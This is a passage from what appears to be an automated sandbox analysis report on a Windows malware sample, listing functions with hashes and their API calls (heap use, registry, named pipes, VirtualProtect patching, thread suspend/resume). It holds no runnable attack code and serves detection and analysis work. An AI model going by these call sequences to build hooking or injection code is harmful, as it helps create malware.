  • Opcode Fuzzy Hash: DAF08162280C9557ED332454000FF6E1756F662081E8D7733CEF3683A759115254F797
  • Instruction Fuzzy Hash: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?,00000008,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,001DE961), ref: 001DE3C0
  • lstrlen.KERNEL32(?), ref: 001DE3F0
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,?,?), ref: 001DE45F
  • memcpy.NTDLL(00000008,001E53C8,00000002,00000000,?,?), ref: 001DE474
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DE8D2, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 103 Total matches: 1string
Similarity
  • Total matches: 1
  • API ID: GetLastErrorlstrlenwsprintf
  • String ID: `
  • API String ID: 1548721612-2679148245
  • Opcode ID: 18e5c3d0780c5ef29ab920ebacb9124f422782ea1152fc1090c3465cc06238a4
  • Instruction ID: f9bb319cb5430bdb8a65939676d8d288483bd17d8fbf8dc94a6d766210595300
  • Opcode Fuzzy Hash: E2F0AC37120AC1EFD9971088541425CD202AB322F688CD7645C32392C7BC827A6FB75F
  • Instruction Fuzzy Hash: f9bb319cb5430bdb8a65939676d8d288483bd17d8fbf8dc94a6d766210595300
APIs
    • Part of subcall function 001DE2F9: lstrlen.KERNEL32(00000000,00000008,00000000,?,00000000,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE305
    • Part of subcall function 001DE2F9: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE363
    • Part of subcall function 001DE2F9: lstrcpy.KERNEL32(00000000,00000008), ref: 001DE373
    • Part of subcall function 001DE2F9: lstrcpy.KERNEL32(00000000,00000000), ref: 001DE37F
  • lstrlen.KERNEL32(?,00000000,00000000,00000004,00000000,?), ref: 001DE91A
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • wsprintfA.USER32 ref: 001DE941
    • Part of subcall function 001DE3AA: GetSystemTimeAsFileTime.KERNEL32(?,00000008,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,001DE961), ref: 001DE3C0
    • Part of subcall function 001DE3AA: lstrlen.KERNEL32(?), ref: 001DE3F0
    • Part of subcall function 001DE3AA: memcpy.NTDLL(00000000,?,?), ref: 001DE45F
    • Part of subcall function 001DE3AA: memcpy.NTDLL(00000008,001E53C8,00000002,00000000,?,?), ref: 001DE474
    • Part of subcall function 001DE6E9: GetVersion.KERNEL32(00000008,00000000,00000000,?,?,001DE988,?,?,00000001,00000000,00000000,?,00000008,00000030), ref: 001DE705
    • Part of subcall function 001DE6E9: GetLastError.KERNEL32(00000008,00000000,00000000,?,?,001DE988,?,?,00000001,00000000,00000000,?,00000008,00000030), ref: 001DE834
    • Part of subcall function 001D9640: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,001DE6F9,00000008,00000000,00000000,?,?,001DE988,?,?,00000001,00000000,00000000), ref: 001D9649
    • Part of subcall function 001D9640: mbstowcs.NTDLL ref: 001D9670
    • Part of subcall function 001D9640: memset.NTDLL ref: 001D9682
  • GetLastError.KERNEL32 ref: 001DE9B6
    • Part of subcall function 001DE840: GetLastError.KERNEL32(?,?,?,001DE9D7,?,00000000,?,?,00000000), ref: 001DE863
    • Part of subcall function 001DE840: GetLastError.KERNEL32(?,?,?,001DE9D7,?,00000000,?), ref: 001DE8BF
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7E94, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 97 Total matches: 56memory
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpymemset
  • String ID: chun
  • API String ID: 1623351483-3058818181
  • Opcode ID: b1cb9c83363d1f5f3482edc3613e0487e364ca7cf0dd43c793242431dbb67071
  • Instruction ID: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
  • Opcode Fuzzy Hash: 1BF081A5584A42C8F8FA3044C1B657556D27F82A9884C7A07C947203BB65C3B7D73F5D
  • Instruction Fuzzy Hash: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
APIs
  • memset.NTDLL ref: 001C7ED0
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
  • memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D892D, Relevance: 6.1, APIs: 4, Instructions: 93 Total matches: 207
Similarity
  • Total matches: 207
  • API ID: GetLastErrorRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 3795092134-0
  • Opcode ID: 9c0483735e420b961606bb44f790258f0624431ad703bd6a52c8d6e915669058
  • Instruction ID: 6c58acee08f53c06707d3df08afd3539b760a59a5b54298cf15ee4468104f17e
  • Opcode Fuzzy Hash: 3DF0AC400B9F91EBE45376440492F59A247BB01FB6E0EE721A9F211BC23F02625D9B1A
  • Instruction Fuzzy Hash: 6c58acee08f53c06707d3df08afd3539b760a59a5b54298cf15ee4468104f17e
APIs
  • memset.NTDLL ref: 001D894F
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 001D8A42
    • Part of subcall function 001D9142: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D917A
    • Part of subcall function 001D9142: SetLastError.KERNEL32(00000000), ref: 001D9181
    • Part of subcall function 001D909F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D90B7
  • memcpy.NTDLL(00000218,001E3E62,00000100,?,00010003,00083097,?,00000318,00000008), ref: 001D89CA
    • Part of subcall function 001D9101: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D912E
    • Part of subcall function 001D9101: SetLastError.KERNEL32(00000000,?,001D8A05,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 001D9135
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001D8A24
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C6604, Relevance: 6.1, APIs: 4, Instructions: 83 Total matches: 29memoryregistry
Similarity
  • Total matches: 29
  • API ID: HeapFreeRegisterWaitForSingleObjectRtlAllocateHeapmemcpy
  • String ID:
  • API String ID: 1976740423-0
  • Opcode ID: 00e719380342739fce2d9a83077352ae1e8e636be9c83fb6a114a482fd48beda
  • Instruction ID: dee2175d0ecb1ce5202f14c2b88485aae8b97b0dc343529db37c2c36949f19d9
  • Opcode Fuzzy Hash: 8CF059B0118943C9E83B20D21991BBEAB423F935CBC0E4631E40308A4F1E4762B63A98
  • Instruction Fuzzy Hash: dee2175d0ecb1ce5202f14c2b88485aae8b97b0dc343529db37c2c36949f19d9
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C665D
  • memcpy.NTDLL(00000018,?,?), ref: 001C6686
  • RegisterWaitForSingleObject.KERNEL32(00000010,?,Function_00005549,00000000,000000FF,00000008), ref: 001C66C5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C66D8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB7D1, Relevance: 6.1, APIs: 4, Instructions: 78 Total matches: 1memory
Similarity
  • Total matches: 1
  • API ID: RtlAllocateHeap$GetLastErrorRtlInitializeCriticalSection
  • String ID:
  • API String ID: 3384439304-0
  • Opcode ID: 7a4f8abde426b5072d3d9704e13dc81ee68460d22b087ed8510a98e131e9efc7
  • Instruction ID: 80107b109b1dfd70152c12f173d035bce88304ee34fa2558259195da71fb9c3a
  • Opcode Fuzzy Hash: F2E09EF0060C41A3D00B348380803F9D58A27530E4A0E5382F6417457E5F138BA1E718
  • Instruction Fuzzy Hash: 80107b109b1dfd70152c12f173d035bce88304ee34fa2558259195da71fb9c3a
APIs
  • RtlAllocateHeap.NTDLL(00000000,-00000003,00000000), ref: 001CB7EB
  • RtlAllocateHeap.NTDLL(00000000,00000838,001E5124), ref: 001DA8C6
  • RtlInitializeCriticalSection.NTDLL(00000000), ref: 001DA8D3
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001DA91A
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CE0EE, Relevance: 6.1, APIs: 4, Instructions: 75 Total matches: 60
Similarity
  • Total matches: 60
  • API ID: GetLastError$RtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 3867703424-0
  • Opcode ID: fbdca7628cbe78cbc3b7d70cd058564445f685c77becf59faaf0370b25f97c7a
  • Instruction ID: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
  • Opcode Fuzzy Hash: 66E0E56338CAC1DB174A70D01AF6A96EC88F8D529254F2F20D418597071E81717F9A1B
  • Instruction Fuzzy Hash: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CE104
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CE11F
  • GetLastError.KERNEL32 ref: 001CE18D
    • Part of subcall function 001CDFE8: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001CE066
    • Part of subcall function 001CDFE8: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CE096
    • Part of subcall function 001CDFE8: memcpy.NTDLL(00000000,?,?), ref: 001CE0A7
  • GetLastError.KERNEL32 ref: 001CE19C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7262, Relevance: 6.1, APIs: 4, Instructions: 75 Total matches: 95string
Similarity
  • Total matches: 95
  • API ID: CloseHandleOpenFileMappinglstrlenmemset
  • String ID:
  • API String ID: 686913658-0
  • Opcode ID: c2b4898062c1065ed0612e860c2cb0de06a6071118fdcd99c43ffcca291be294
  • Instruction ID: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
  • Opcode Fuzzy Hash: 0DF05C570219CDC7C4221114D800B11B5257B76C6ACEC9399FCA014D948E0A31A9BE0B
  • Instruction Fuzzy Hash: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
APIs
  • memset.NTDLL ref: 001C7284
    • Part of subcall function 001CBCD2: CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
    • Part of subcall function 001CBCD2: GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
    • Part of subcall function 001CBCD2: WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
    • Part of subcall function 001CBCD2: WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
  • lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 001C72C8
  • OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 001C730E
  • CloseHandle.KERNEL32(?), ref: 001C7331
    • Part of subcall function 001C7341: GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
    • Part of subcall function 001C7341: CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
    • Part of subcall function 001C7341: GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
    • Part of subcall function 001C7341: CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
    • Part of subcall function 001C7341: lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
    • Part of subcall function 001C7341: lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
    • Part of subcall function 001C7341: HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
    • Part of subcall function 001C7341: CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B33F3A, Relevance: 6.1, APIs: 4, Instructions: 75 Total matches: 114
Similarity
  • Total matches: 114
  • API ID: CloseHandleGetSidSubAuthorityGetSidSubAuthorityCountOpenProcessToken
  • String ID:
  • API String ID: 3243309207-0
  • Opcode ID: daf6b00ae99c80d22f011dd47a129de89f1e33b4c2e36c8a2c33b66dba590708
  • Instruction ID: b78d02c5baa715c8e8538e39e195cedf048cde2c72120d51ace7b5a65273c297
  • Opcode Fuzzy Hash: 45E02B814FCFC2D7AB5F2404059175270E6EF60E05C9D9B647520BA5665E3031257E9B
  • Instruction Fuzzy Hash: b78d02c5baa715c8e8538e39e195cedf048cde2c72120d51ace7b5a65273c297
APIs
  • OpenProcessToken.ADVAPI32(000000FF,00020008,01B37494,00000000), ref: 01B33F6C
  • CloseHandle.KERNEL32(01B37494), ref: 01B33FEC
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 01B33FC7
  • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 01B33FD7
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001C7664, Relevance: 6.1, APIs: 4, Instructions: 74 Total matches: 40memory
Similarity
  • Total matches: 40
  • API ID: HeapFree$GetLastErrorRtlAllocateHeap
  • String ID:
  • API String ID: 692199287-0
  • Opcode ID: 4904fb8dbc2e953e77b98dbe9d3f55cb9d56c3531de4b3fdb52f823351afa574
  • Instruction ID: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
  • Opcode Fuzzy Hash: C2E0D8351D48C3E3812714E9D064BFEE500AB805C0E0D26ABBD847D20C9D127076E7C6
  • Instruction Fuzzy Hash: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
  • GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
  • HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B31395, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71 Total matches: 21memory
Similarity
  • Total matches: 21
  • API ID: GetLastErrorHeapFreememset
  • String ID: D
  • API String ID: 2843147199-2746444292
  • Opcode ID: 7d6f6f6309830c53eb87eb1248ac9b1ade3661ad178ea1527cba377d544f1ce2
  • Instruction ID: 1818fd78c2c0a364e7614ca651566d831b80b8fadd13cef08670214cb7cc6660
  • Opcode Fuzzy Hash: BDE068961F0CC4E2C49844CC6273B01E3200FA055ACDDE72036A8340637A20F51DCBA4
  • Instruction Fuzzy Hash: 1818fd78c2c0a364e7614ca651566d831b80b8fadd13cef08670214cb7cc6660
APIs
  • memset.NTDLL ref: 01B313B5
    • Part of subcall function 01B33340: GetProcAddress.KERNEL32(01B3866B,01B345D9,00000000,01B3618C,00000000,00000000,?,?,?,01B311A6,?,01B3618C,00000000,00000000), ref: 01B33354
  • GetLastError.KERNEL32(00000001), ref: 01B31422
  • HeapFree.KERNEL32(00000000,00000000), ref: 01B31433
    • Part of subcall function 01B322D2: memset.NTDLL ref: 01B322F5
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?,00000000,01B324C1,CCCCFEEB,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B32380
    • Part of subcall function 01B322D2: WaitForSingleObject.KERNEL32(00000064), ref: 01B3238E
    • Part of subcall function 01B322D2: SuspendThread.KERNELBASE(?), ref: 01B323A1
    • Part of subcall function 01B322D2: GetLastError.KERNEL32(00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B3240D
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?), ref: 01B32418
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001C28FD, Relevance: 6.1, APIs: 4, Instructions: 68 Total matches: 55registrystring
Similarity
  • Total matches: 55
  • API ID: RegCloseKeyRegOpenKeylstrcmpilstrlen
  • String ID:
  • API String ID: 352456400-0
  • Opcode ID: 9381e8ebef87ae03ea2b4a3254f2d425f4b44f3dd01b09b1a235e089a5947b32
  • Instruction ID: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
  • Opcode Fuzzy Hash: 71E02B73858AC38A80833424A43A7B7D714AF102D794D2717E9849E1057F9631AA7B66
  • Instruction Fuzzy Hash: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
  • lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
  • lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D799E, Relevance: 6.1, APIs: 4, Instructions: 68 Total matches: 87string
Similarity
  • Total matches: 87
  • API ID: GetModuleHandleStrChrlstrcpylstrlen
  • String ID:
  • API String ID: 2222289486-0
  • Opcode ID: 864a615e2bbc61195937544d5275c128a98c955975673d031bfe47106b2bd609
  • Instruction ID: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
  • Opcode Fuzzy Hash: B6E0AB26038D8847CEF7D444210378A8600BB91189C9EE720EC51605830F0032D3E90B
  • Instruction Fuzzy Hash: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
APIs
  • lstrlen.KERNEL32(?,?,?,?,001CB2EF), ref: 001D79D6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • lstrcpy.KERNEL32(00000000,?), ref: 001D79ED
  • StrChrA.SHLWAPI(00000000,0000002E), ref: 001D79F6
  • GetModuleHandleA.KERNEL32(00000000,?,001CB2EF), ref: 001D7A14
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,?,00000000,001D7F8B,001E7508,0000001C,001D7C1F,00000002,00000000,00000001,00000001,?,00000001), ref: 001D7AA7
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,?,00000000,?,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000), ref: 001D7B07
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,?,001D7F8B,00000000,?,?), ref: 001D7B3B
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(?,00000004,00000000,00000000,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001), ref: 001D7B52
    • Part of subcall function 001D7A61: RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D7B72
    • Part of subcall function 001D7A61: RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D7B90
    • Part of subcall function 001D7A61: GetLastError.KERNEL32(?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001,?,001CD6FE), ref: 001D7BB8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DD885, Relevance: 6.1, APIs: 4, Instructions: 61 Total matches: 76memorystring
Similarity
  • Total matches: 76
  • API ID: memcpy$RtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 3529742955-0
  • Opcode ID: e8f8f21a638fa0bf49e5fc9491458e8ae2be9dfe9c76977686a4510d875031ce
  • Instruction ID: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
  • Opcode Fuzzy Hash: 8EE07D71CD4A10C0A007C448A9103BAF35F6840293E0CE570EC01F690F0BD2A1F0035B
  • Instruction Fuzzy Hash: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
APIs
  • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD890
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001DD8A8
  • memcpy.NTDLL(00000000,?,-00000008,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD8EC
  • memcpy.NTDLL(00000001,?,00000001), ref: 001DD90D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D7471, Relevance: 6.1, APIs: 4, Instructions: 59 Total matches: 43stringthreadtime
Similarity
  • Total matches: 43
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamelstrcpy
  • String ID:
  • API String ID: 3418835849-0
  • Opcode ID: 48e92af7de5b1f14262d718c1bb04bd461a0a548bd9a3e9d293402e4cb923fe1
  • Instruction ID: 28715601aaafb22b36b215bc7c5ba57760e8370145e7159df0df034c56fa7ec5
  • Opcode Fuzzy Hash: 46D02B399919C4FB492B4468141036A4C8128283DD14C3553FC21055457F02318D3F26
  • Instruction Fuzzy Hash: 28715601aaafb22b36b215bc7c5ba57760e8370145e7159df0df034c56fa7ec5
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
  • lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB4E6, Relevance: 6.1, APIs: 4, Instructions: 57 Total matches: 46sleep
Similarity
  • Total matches: 46
  • API ID: RtlEnterCriticalSectionRtlLeaveCriticalSectionSetEventSleep
  • String ID:
  • API String ID: 522987270-0
  • Opcode ID: 8cc2b4e76e7c6786e8c4d2b22bf8b4b6a679c49f941b40daf46a87d1c8b23fb6
  • Instruction ID: 1e3edd6de38308fdc5cd11c9fcbd00204bafdbd531665641dfe8eb1a79e4ebb8
  • Opcode Fuzzy Hash: 1BE0DF31184C8ACB405B38B05C420B38FA9EB522D184CDF63DC00A216CBA63316F5EAB
  • Instruction Fuzzy Hash: 1e3edd6de38308fdc5cd11c9fcbd00204bafdbd531665641dfe8eb1a79e4ebb8
APIs
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001CB4F1
  • Sleep.KERNEL32(0000000A,?,?,001CCC60,00000000), ref: 001CB4FB
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001CB588
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • SetEvent.KERNEL32(?,?,001CCC60), ref: 001CB552
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2554, Relevance: 6.1, APIs: 4, Instructions: 54 Total matches: 57memorystringtime
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 407846186-0
  • Opcode ID: 703a57e9545ddbfd879067786fd798182cf2c7cd56fd51e5cdfbf21bb808e58b
  • Instruction ID: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
  • Opcode Fuzzy Hash: 67D02714050602D5143B4125871073D4D05F4727D764D03D7EE057F40B6F4377D1453B
  • Instruction Fuzzy Hash: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C2567
  • lstrlen.KERNEL32(001EAF98), ref: 001C2588
  • RtlAllocateHeap.NTDLL(00000000,00000014), ref: 001C25A0
  • lstrcpy.KERNEL32(00000000,001EAF98), ref: 001C25B2
    • Part of subcall function 001D7438: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,00000000,001C25BE,00000000), ref: 001D744D
    • Part of subcall function 001D7438: GetLastError.KERNEL32 ref: 001D7457
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4E59, Relevance: 6.1, APIs: 4, Instructions: 54 Total matches: 57memorystring
Similarity
  • Total matches: 57
  • API ID: RtlAllocateHeaplstrcpylstrlenmemcpy
  • String ID:
  • API String ID: 3373643552-0
  • Opcode ID: 475b22c542f700798171592f4f35c0392c344f2fb33802a196dbca7db7e117d6
  • Instruction ID: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
  • Opcode Fuzzy Hash: 1BE07250414E8482E237900A00A377FA7C1FE93A9580CAA22FE0B0010F2B432683A23E
  • Instruction Fuzzy Hash: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
APIs
  • lstrlen.KERNEL32(?), ref: 001C4E66
  • RtlAllocateHeap.NTDLL(00000000,00000015), ref: 001C4E8C
  • lstrcpy.KERNEL32(00000014,?), ref: 001C4EB1
  • memcpy.NTDLL(?,?,?), ref: 001C4EBE
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2884, Relevance: 6.0, APIs: 4, Instructions: 41 Total matches: 66filestringsynchronization
Similarity
  • Total matches: 66
  • API ID: CreateFileGetLastErrorWaitForSingleObjectlstrcat
  • String ID:
  • API String ID: 1450029813-0
  • Opcode ID: 8e9c4f27ea08848543a801e9cdb05178d747e0c7379010af42e4ca9c2a234582
  • Instruction ID: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
  • Opcode Fuzzy Hash: D2D05E79C125829AD467AA64110037BE80B5B532D0E6C0226F854A262E4B92B0FC7F49
  • Instruction Fuzzy Hash: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
APIs
  • lstrcatW.KERNEL32(00000000,00000000), ref: 001C2896
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • WaitForSingleObject.KERNEL32(00002710,00000000), ref: 001C28B9
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C28DB
  • GetLastError.KERNEL32(?,001C2AC6,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C28EF
Memory Dump Source
